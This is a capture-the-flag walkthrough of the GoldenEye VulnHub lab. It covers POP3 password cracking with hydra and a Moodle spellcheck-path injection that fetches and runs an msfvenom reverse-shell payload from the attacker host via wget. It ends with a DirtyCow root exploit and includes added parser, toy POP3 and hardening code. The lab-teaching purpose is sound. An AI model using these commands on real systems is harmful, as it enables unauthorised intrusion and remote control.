To break the boredom during a long flight, I had planned to play with the GoldenEye machine from VulnHub. Not only does it challenge my skills, it also helps me get through those arduous journeys sooner.
Once the .ova file was downloaded, I imported it into VirtualBox and ran an Nmap scan of the entire network (192.168.99.100/24). It revealed the IP address assigned to the machine as 192.168.99.100. Then I did a quick Nmap scan, and below are the results:
On looking at the web server, it had the following message:
It gave a hint that pop3 is running on an unconventional port. Doing an intense Nmap scan gave the following result, indicating that pop3 is running on ports 55006 and 55007.
Nmap scan report for 192.168.99.100
Host is up (0.00041s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu
| Issuer: commonName=ubuntu
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:22:34
| Not valid after:  2028-04-21T03:22:34
| MD5:   cd4a d178 f216 17fb 21a6 0a16 8f46 c8c6
|_SHA-1: fda3 fc7b 6601 4746 96aa 0f56 b126 1c29 36e8 442c
|_ssl-date: TLS randomness does not represent time
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING SASL(PLAIN) RESP-CODES USER AUTH-RESP-CODE TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
55007/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE PIPELINING RESP-CODES UIDL USER SASL(PLAIN) STLS TOP CAPA
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Issuer: commonName=localhost/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-04-24T03:23:52
| Not valid after:  2028-04-23T03:23:52
| MD5:   d039 2e71 c76a 2cb3 e694 ec40 7228 ec63
|_SHA-1: 9d6a 92eb 5f9f e9ba 6cbd dc93 55fa 5754 219b 0b77
|_ssl-date: TLS randomness does not represent time
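Spotting the off-port services by eye works on one host, but it does not scale across a subnet. The following is an added example (my code, not part of the original write-up) that parses Nmap's normal-output PORT lines and flags open services whose port is not the registered default for that service. The embedded scan text is a trimmed copy of the output above, and the DEFAULT_PORTS table is a small hand-picked subset of IANA assignments, so any service missing from it is simply not judged.

```python
import re

# Constructed sample: a trimmed copy of the `nmap -p- -sV` output shown above.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.99.100
Host is up (0.00041s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-title: GoldenEye Primary Admin Server
55006/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING SASL(PLAIN) RESP-CODES USER AUTH-RESP-CODE TOP CAPA
55007/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE PIPELINING RESP-CODES UIDL USER SASL(PLAIN) STLS TOP CAPA
"""

# Registered default ports for a handful of services (subset of IANA assignments;
# extend as needed). A service absent from this table is never flagged.
DEFAULT_PORTS = {
    "ssh": {22}, "smtp": {25, 587}, "http": {80}, "pop3": {110},
    "ssl/pop3": {995}, "pop3s": {995}, "imap": {143}, "ssl/imap": {993},
}

# One Nmap PORT line: "<port>/<proto> <state> <service> [version...]".
# Script output lines start with "|" or "|_" and never match.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_nmap_ports(text):
    """Return one dict per PORT line: port, proto, state, service, version."""
    results = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue  # banner, "Not shown", header and script-output lines
        port, proto, state, service, version = m.groups()
        results.append({"port": int(port), "proto": proto, "state": state,
                        "service": service, "version": version.strip()})
    return results


def off_port_services(ports):
    """Open services listening somewhere other than their registered port."""
    return [p for p in ports
            if p["state"] == "open"
            and p["service"] in DEFAULT_PORTS
            and p["port"] not in DEFAULT_PORTS[p["service"]]]


if __name__ == "__main__":
    for p in off_port_services(parse_nmap_ports(SAMPLE_NMAP_OUTPUT)):
        print(f"{p['service']} on non-default port {p['port']}/{p['proto']}: {p['version']}")
```

Nmap's service column is what -sV fingerprinted, not what the port number implies, which is exactly why a mail daemon on 55007 still shows up as pop3 and can be matched against the table.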
The sev-home page listed the names of the GoldenEye Network Operator Supervisors, prompting a dictionary attack. For those accounts on pop3, hydra came to the rescue; the password was not complex, so it was easy to crack with the word list available in Kali Linux. Checking the mails using telnet to connect to pop3 (using the commands USER, PASS, STAT to get statistics and RETR n to retrieve message n), there was a hint that a new trainee, Xenia, had joined the company and had to be given access to the application. Furthermore, the host entry '192.168.99.100 severnaya-station.com' had to be added to the '/etc/hosts' file to access the application, because the Host header had to be 'severnaya-station.com'. One of the emails received by Natalyn had the login credentials for Moodle. After logging in, it said that Xenia didn't have access to view the course, but there was a welcome message from Dr_dork specifying his username as 'doak'. It was possible to crack his password and obtain his credentials from pop3, and the mail revealed a secret image. Looking for strings in the image gave a base64 encoded password, which was the admin password for the Moodle system.
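The USER/PASS/STAT/RETR session above is plain text by design, which is why telnet is enough to read a mailbox once a password has been guessed. As an added example (my code, not from the original write-up), the block below speaks that same subset of POP3 by hand against a throw-away server started in a thread; the server, the account name "trainee", its password and both messages are constructed for this example and are not the GoldenEye accounts or mail. The client also undoes RFC 1939 byte-stuffing, which a raw telnet session leaves for you to read around.

```python
import socket
import threading

# Constructed mailbox for the toy server: user, password and two messages made
# up for this example. The second body starts with "." to exercise byte-stuffing.
CONSTRUCTED_MAILBOX = {
    ("trainee", "pass123"): [
        "From: boss@example.test\r\nSubject: onboarding\r\n\r\nWelcome aboard.\r\n",
        "From: it@example.test\r\nSubject: access\r\n\r\n"
        ".The app lives behind a vhost; add it to /etc/hosts.\r\n",
    ],
}


def _run_pop3_server(listener, mailbox):
    """Serve one session: USER/PASS, then STAT, RETR n and QUIT (RFC 1939 subset)."""
    conn, _ = listener.accept()
    with conn, conn.makefile("rb") as rx:
        def send(line):
            conn.sendall(line.encode() + b"\r\n")

        send("+OK toy POP3 ready")
        user, msgs = None, None
        for raw in rx:
            cmd, _, arg = raw.decode().rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                send("+OK")
            elif cmd == "PASS":
                msgs = mailbox.get((user, arg))       # None on a bad credential pair
                send("+OK logged in" if msgs is not None else "-ERR auth failed")
            elif cmd == "QUIT":
                send("+OK bye")
                break
            elif msgs is None:
                send("-ERR not authenticated")
            elif cmd == "STAT":
                send(f"+OK {len(msgs)} {sum(len(m) for m in msgs)}")
            elif cmd == "RETR" and arg.isdigit() and 1 <= int(arg) <= len(msgs):
                body = msgs[int(arg) - 1].rstrip("\r\n")
                send(f"+OK {len(body)} octets")
                for line in body.split("\r\n"):
                    # byte-stuffing: a line beginning with "." goes out as ".."
                    send("." + line if line.startswith(".") else line)
                send(".")                              # end of multi-line response
            else:
                send("-ERR unknown command or bad argument")


def pop3_fetch(host, port, user, password):
    """The telnet session by hand: USER, PASS, STAT, RETR 1..n, QUIT. Returns bodies."""
    with socket.create_connection((host, port), timeout=5) as s, s.makefile("rb") as rx:
        def cmd(line):
            s.sendall(line.encode() + b"\r\n")
            resp = rx.readline().decode().rstrip("\r\n")
            if not resp.startswith("+OK"):
                # report only the verb, never the argument (it may be the password)
                raise RuntimeError(f"{line.split()[0]} failed: {resp}")
            return resp

        rx.readline()                                  # server greeting
        cmd(f"USER {user}")
        cmd(f"PASS {password}")
        count = int(cmd("STAT").split()[1])            # "+OK <count> <octets>"
        messages = []
        for n in range(1, count + 1):
            cmd(f"RETR {n}")
            lines = []
            while True:
                line = rx.readline().decode().rstrip("\r\n")
                if line == ".":
                    break
                lines.append(line[1:] if line.startswith(".") else line)  # un-stuff
            messages.append("\r\n".join(lines))
        cmd("QUIT")
        return messages


def demo(user="trainee", password="pass123"):
    """Start the toy server on a free loopback port and read the mailbox."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    threading.Thread(target=_run_pop3_server,
                     args=(listener, CONSTRUCTED_MAILBOX), daemon=True).start()
    try:
        return pop3_fetch("127.0.0.1", listener.getsockname()[1], user, password)
    finally:
        listener.close()


if __name__ == "__main__":
    for i, m in enumerate(demo(), 1):
        print(f"--- message {i} ---\n{m}")
```

Against a real server on 55007 the same exchange works over telnet or a TLS wrapper on 55006; the point of the code is that nothing in the protocol slows a guess down, which is what made the hydra run cheap.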
To get a reverse shell, follow these steps in Moodle:
- Change the executable path of 'spellcheck' so that it runs code.
- Replace the default spell check engine of the TinyMCE HTML editor with 'PSpellShell' (this is the engine that invokes the spellcheck binary configured in the path).
- Change the aspell path under 'System paths' (in the Server settings) to sh -c '(wget http://192.168.99.101/metershell -O /tmp/metershell; chmod +x /tmp/metershell;/tmp/metershell &)' and save the settings. The trailing & matters: the payload is backgrounded so the spellcheck request returns and the web worker does not hang.
- Generate a payload with msfvenom using the command msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.99.101 LPORT=443 -f elf -o metershell (replace the IP address with that of your attacking machine).
- Start a web server on port 80, using either Apache or python -m SimpleHTTPServer 80, from the directory holding the payload.
- Start the listener for the reverse shell with nc -lvp 443.
- Go to any page where TinyMCE is used (for example, the blog), add some text and run a spell check. Doing this gets us a reverse shell like the one in the screenshot below:
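What makes the aspell path a code-execution sink is not the value itself but how it is consumed: a configured string is pasted into a command line that the shell parses, so a value of the form sh -c '...' stops being a path and becomes a program. The block below is my added illustration of that sink, not Moodle's or TinyMCE's code; the command shape "<path> -a --lang=<lang>" and the function names are assumptions made for the example, and the injected value is a benign echo standing in for the wget/chmod/execute chain above.

```python
import os
import subprocess

# Benign stand-in for the wget/chmod/run chain in the write-up (constructed).
BENIGN_INJECTION = "sh -c 'echo payload-ran'"

# Only real spell checkers may be configured, and only by absolute path.
ALLOWED_SPELLERS = {"aspell", "hunspell"}


def build_spell_command_vulnerable(aspell_path, lang="en"):
    """Model of the sink: the admin-controlled path is spliced into a shell string."""
    return f"{aspell_path} -a --lang={lang}"


def run_spellcheck_vulnerable(aspell_path, text, lang="en"):
    """shell=True hands the whole string to /bin/sh, so quoting in the configured
    value is honoured and "sh -c '...'" runs as a command; "-a --lang=en" just
    become $0 and $1 of the injected script."""
    return subprocess.run(build_spell_command_vulnerable(aspell_path, lang),
                          shell=True, input=text, capture_output=True, text=True)


def validate_spell_path(path):
    """Absolute path, basename on the allow-list, and an executable regular file."""
    return (os.path.isabs(path)
            and os.path.basename(path) in ALLOWED_SPELLERS
            and os.path.isfile(path)
            and os.access(path, os.X_OK))


def run_spellcheck_hardened(aspell_path, text, lang="en"):
    """Validate first, then exec an argv list: the configured value is argv[0]
    and nothing else, so shell metacharacters inside it are never interpreted."""
    if not validate_spell_path(aspell_path):
        raise ValueError("spellcheck binary path rejected")
    return subprocess.run([aspell_path, "-a", f"--lang={lang}"],
                          input=text, capture_output=True, text=True)


if __name__ == "__main__":
    print(run_spellcheck_vulnerable(BENIGN_INJECTION, "").stdout, end="")
    try:
        run_spellcheck_hardened(BENIGN_INJECTION, "")
    except ValueError as e:
        print("hardened:", e)
```

Even with argv-style execution, an administrator who can point the setting at /bin/sh still gets code execution, which is why the hardened version also pins the basename; in Moodle's threat model the admin is trusted, so the practical defence is protecting the admin credential, which is exactly what the image-to-base64 chain above handed over.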
The Linux kernel was an older version, vulnerable to DirtyCow. Compiling the exploit and running it gave a root shell.
Although the challenges were not too complex, it was fun getting the root shell, and it kept the boredom away during my journey.